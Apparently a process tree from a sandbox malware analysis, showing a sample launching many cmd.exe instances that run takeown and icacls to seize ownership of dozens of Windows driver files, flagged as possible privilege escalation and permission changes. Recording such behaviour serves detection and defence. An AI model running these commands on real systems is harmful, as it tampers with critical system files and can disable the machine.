C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pci.sys && icacls C:\Windows\System32\drivers\pci.sys /grant "%username%:F" && exit2⤵PID:3000
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pci.sys3⤵PID:4468
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciide.sys && icacls C:\Windows\System32\drivers\pciide.sys /grant "%username%:F" && exit2⤵PID:1456
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciide.sys3⤵
- Possible privilege escalation attempt
PID:5152
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pciidex.sys && icacls C:\Windows\System32\drivers\pciidex.sys /grant "%username%:F" && exit2⤵PID:3080
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pciidex.sys3⤵PID:5212
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcmcia.sys && icacls C:\Windows\System32\drivers\pcmcia.sys /grant "%username%:F" && exit2⤵PID:3064
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcmcia.sys3⤵PID:5040
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\pcw.sys && icacls C:\Windows\System32\drivers\pcw.sys /grant "%username%:F" && exit2⤵PID:2464
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\pcw.sys3⤵
- Modifies file permissions
PID:5132
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\PEAuth.sys && icacls C:\Windows\System32\drivers\PEAuth.sys /grant "%username%:F" && exit2⤵PID:2552
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\PEAuth.sys3⤵PID:5204
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\portcls.sys && icacls C:\Windows\System32\drivers\portcls.sys /grant "%username%:F" && exit2⤵PID:3328
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\portcls.sys3⤵
- Possible privilege escalation attempt
PID:5260
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\processr.sys && icacls C:\Windows\System32\drivers\processr.sys /grant "%username%:F" && exit2⤵PID:3600
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\processr.sys3⤵PID:5356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql2300.sys && icacls C:\Windows\System32\drivers\ql2300.sys /grant "%username%:F" && exit2⤵PID:3712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql2300.sys3⤵
- Possible privilege escalation attempt
PID:5428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ql40xx.sys && icacls C:\Windows\System32\drivers\ql40xx.sys /grant "%username%:F" && exit2⤵PID:4128
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ql40xx.sys3⤵
- Modifies file permissions
PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\qwavedrv.sys && icacls C:\Windows\System32\drivers\qwavedrv.sys /grant "%username%:F" && exit2⤵PID:4192
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\qwavedrv.sys3⤵PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasacd.sys && icacls C:\Windows\System32\drivers\rasacd.sys /grant "%username%:F" && exit2⤵PID:4236
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasacd.sys3⤵
- Possible privilege escalation attempt
PID:5704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rasl2tp.sys && icacls C:\Windows\System32\drivers\rasl2tp.sys /grant "%username%:F" && exit2⤵PID:4324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rasl2tp.sys3⤵PID:5868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspppoe.sys && icacls C:\Windows\System32\drivers\raspppoe.sys /grant "%username%:F" && exit2⤵PID:4360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspppoe.sys3⤵PID:5856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\raspptp.sys && icacls C:\Windows\System32\drivers\raspptp.sys /grant "%username%:F" && exit2⤵PID:4400
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\raspptp.sys3⤵PID:5944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rassstp.sys && icacls C:\Windows\System32\drivers\rassstp.sys /grant "%username%:F" && exit2⤵PID:4432
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rassstp.sys3⤵PID:6064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdbss.sys && icacls C:\Windows\System32\drivers\rdbss.sys /grant "%username%:F" && exit2⤵PID:4448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdbss.sys3⤵PID:5888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpbus.sys && icacls C:\Windows\System32\drivers\rdpbus.sys /grant "%username%:F" && exit2⤵PID:4488
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpbus.sys3⤵PID:6112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPCDD.sys && icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "%username%:F" && exit2⤵PID:4540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPCDD.sys3⤵PID:3316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpdr.sys && icacls C:\Windows\System32\drivers\rdpdr.sys /grant "%username%:F" && exit2⤵PID:4584
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpdr.sys3⤵PID:6076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPENCDD.sys && icacls C:\Windows\System32\drivers\RDPENCDD.sys /grant "%username%:F" && exit2⤵PID:4608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPENCDD.sys3⤵PID:6084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RDPREFMP.sys && icacls C:\Windows\System32\drivers\RDPREFMP.sys /grant "%username%:F" && exit2⤵PID:4640
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RDPREFMP.sys3⤵PID:3348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys && icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "%username%:F" && exit2⤵PID:4656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpvideominiport.sys3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdpwd.sys && icacls C:\Windows\System32\drivers\rdpwd.sys /grant "%username%:F" && exit2⤵PID:4688
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdpwd.sys3⤵
- Modifies file permissions
PID:5460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rdyboost.sys && icacls C:\Windows\System32\drivers\rdyboost.sys /grant "%username%:F" && exit2⤵PID:4704
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rdyboost.sys3⤵
- Modifies file permissions
PID:3592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rmcast.sys && icacls C:\Windows\System32\drivers\rmcast.sys /grant "%username%:F" && exit2⤵PID:4740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rmcast.sys3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit2⤵PID:4756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\RNDISMP.sys3⤵PID:5404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit2⤵PID:4776
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rootmdm.sys3⤵
- Possible privilege escalation attempt
PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit2⤵PID:4796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\rspndr.sys3⤵PID:3988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit2⤵PID:4816
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Rtnic64.sys3⤵PID:5988
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit2⤵PID:4864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sbp2port.sys3⤵
- Possible privilege escalation attempt
PID:6164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit2⤵PID:4892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scfilter.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit2⤵PID:4932
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\scsiport.sys3⤵PID:6252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit2⤵PID:4980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\secdrv.sys3⤵
- Modifies file permissions
PID:6308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit2⤵PID:5000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serenum.sys3⤵
- Possible privilege escalation attempt
PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit2⤵PID:5016
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\serial.sys3⤵
- Possible privilege escalation attempt
PID:6372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit2⤵PID:5044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sermouse.sys3⤵PID:6320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit2⤵PID:5064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffdisk.sys3⤵PID:6352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit2⤵PID:5088
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_mmc.sys3⤵PID:6460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit2⤵PID:5112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sffp_sd.sys3⤵PID:6400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit2⤵PID:3980
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sfloppy.sys3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid2.sys3⤵PID:6620
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit2⤵PID:3676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\sisraid4.sys3⤵PID:6520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit2⤵PID:3868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smb.sys3⤵PID:6556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\smclib.sys3⤵PID:6628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit2⤵PID:836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spldr.sys3⤵PID:6680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit2⤵PID:2612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\spsys.sys3⤵PID:6760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit2⤵PID:2044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv.sys3⤵PID:6716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit2⤵PID:2276
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srv2.sys3⤵PID:6724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit2⤵PID:2828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\srvnet.sys3⤵PID:6796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit2⤵PID:1728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stexstor.sys3⤵PID:6776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit2⤵PID:3372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storport.sys3⤵PID:6856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit2⤵PID:748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\storvsc.sys3⤵PID:6948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit2⤵PID:4228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\stream.sys3⤵PID:6844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit2⤵PID:4396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\swenum.sys3⤵PID:6872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit2⤵PID:4748
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Synth3dVsc.sys3⤵PID:6968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit2⤵PID:4948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tape.sys3⤵
- Possible privilege escalation attempt
PID:7016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit2⤵PID:5080
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpip.sys3⤵PID:7076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit2⤵PID:3612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tcpipreg.sys3⤵
- Modifies file permissions
PID:5412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit2⤵PID:5144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdi.sys3⤵
- Possible privilege escalation attempt
PID:7164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit2⤵PID:5220
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdpipe.sys3⤵PID:7128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit2⤵PID:5240
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdtcp.sys3⤵
- Possible privilege escalation attempt
PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit2⤵PID:5268
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tdx.sys3⤵
- Modifies file permissions
PID:5456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit2⤵PID:5292
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\termdd.sys3⤵
- Possible privilege escalation attempt
PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit2⤵PID:5328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\terminpt.sys3⤵PID:6424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit2⤵PID:5344
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tssecsrv.sys3⤵PID:6192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit2⤵PID:5372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbFlt.sys3⤵PID:4528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit2⤵PID:5396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\TsUsbGD.sys3⤵PID:4652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit2⤵PID:5416
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tsusbhub.sys3⤵PID:5832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:5444
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵
- Possible privilege escalation attempt
PID:3224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:5476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:6152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:5504
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:5524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵
- Modifies file permissions
PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:5540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:5604
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:4260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:5644
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:1520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:5660
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\USBCAMD2.sys3⤵PID:4296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:5676
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:5712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbcir.sys3⤵PID:7176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:5728
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbd.sys3⤵PID:4424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit2⤵PID:5760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbehci.sys3⤵PID:7248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit2⤵PID:5772
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbhub.sys3⤵PID:7292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit2⤵PID:5788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbohci.sys3⤵PID:7268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit2⤵PID:5836
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbport.sys3⤵PID:7276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit2⤵PID:5900
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbprint.sys3⤵
- Modifies file permissions
PID:7284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit2⤵PID:5936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbrpm.sys3⤵PID:7348
-
-
-
